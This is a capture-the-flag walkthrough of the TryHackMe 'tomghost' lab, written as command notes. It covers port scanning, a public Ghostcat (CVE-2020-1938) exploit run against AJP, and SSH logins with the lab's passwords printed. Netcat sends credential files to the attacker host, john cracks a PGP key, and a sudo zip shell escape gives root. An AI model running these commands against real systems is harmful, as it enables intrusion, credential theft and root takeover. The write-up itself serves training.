tomghost

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/8080 - HTTP

Kali

gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Initial Access

TCP/8009 - AJP (Ghostcat, CVE-2020-1938; run from the attacker box, not on the victim)

Kali

git clone https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat.git 
cd Hacking-Vulnerability-CVE-2020-1938-Ghostcat/
python2 CVE-2020-1938.py $VICTIM -p 8009 -f WEB-INF/web.xml

TCP/22 - SSH

Kali

ssh skyfuck@$VICTIM
Password: 8730281lkjlkjdqlksalks

Netcat

Kali (receiving; start one listener at a time, before each send)

nc -l -p 1234 > credential.pgp
nc -l -p 1234 > tryhackme.asc

Victim (sending)

nc -w 3 $KALI 1234 < credential.pgp
nc -w 3 $KALI 1234 < tryhackme.asc

Kali

/opt/john/gpg2john tryhackme.asc > pgp.hash
john pgp.hash --wordlist=/usr/share/wordlists/rockyou.txt

Kali

gpg --import tryhackme.asc 
Password: alexandru

Kali

gpg --decrypt credential.pgp 
Password: alexandru

Privilege Escalation

TCP/22 - SSH

Kali

ssh merlin@$VICTIM
Password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

Exploit: https://gtfobins.github.io/gtfobins/zip/

Victim

sudo -l

Victim

TF=$(mktemp -u)
# -T tests the archive, -TT replaces the test command; 'sh #' comments out the
# archive name zip appends, so zip (running as root via sudo) just spawns sh
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
